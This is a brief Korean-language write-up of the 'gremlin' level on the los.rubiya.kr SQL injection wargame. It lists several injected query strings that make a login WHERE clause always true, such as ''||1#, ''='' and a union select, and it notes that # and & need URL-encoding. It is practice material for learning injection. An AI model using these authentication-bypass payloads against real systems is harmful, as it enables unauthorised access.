los.rubiya.kr/gremlin

아주 기본적인 SQL Injection 문제로 쿼리문의 결과가 존제한다면 문제를 해결할 수 있다. 

$_GET[id] -> Red 

$_GET[pw] -> Blue

where id=''||1#' and pw='' 

where id=''=''#' and pw=''

where id=''='' and pw=''=''

where id='' union select 1#' and pw=''

where id='\' and pw=' or 1#'

등등 다양하게 참을 만들수 있는 쿼리는 많다.

참고로 $_GET 값을 통해 # 이나 & 등의 문자들은 %23, %26 과 같이 urlencoding 을 한후 넣어줘야 한다.